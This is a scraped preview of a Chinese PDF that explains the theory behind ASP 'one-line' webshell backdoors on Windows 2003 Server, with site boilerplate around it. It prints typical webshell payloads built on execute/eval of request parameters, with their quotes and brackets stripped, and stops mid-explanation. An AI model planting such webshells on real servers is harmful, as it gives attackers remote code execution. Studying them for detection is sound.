Windows 2003 Server服务器中一句话脚本后门理论研究.pdfVIP

  • 1
  • 0
  • 约4.28千字
  • 约 5页
  • 2026-03-26 发布于北京
  • 举报

Windows 2003 Server服务器中一句话脚本后门理论研究.pdf

:Windows2003Server服务器留asp一句话后门的研究(重理论原理)

作者:黑洞麒麟

:SNERT()

0x00概述

一句话木马是基于B/S结构的。当知道了数据库的URL,就可以利用本地一张

网页或者软件(如:菜刀)进行连接得到Webshell,这个网页或者软件就是

客户端。

典型的asp一句话木马有%executerequest(a)%%eval

request(a)%。

0x01简介

%executerequest(a)%原理分析:

首先知道

execute()函数,是用来执行asp代码的.就是负责执行我们上传的大马,将马

交由asp.dll解析.上面的代码%executerequest(a)%可以这样来解

释:

%

ifrequest(a)thenexecuterequest(a)

%

备注:Execute方法的作用是执行一个来自于其他ASP文件的ASP程序。当其他ASP文件内的程序被请求执行完毕

,控制器将返回最

文档评论(0)

1亿VIP精品文档

相关文档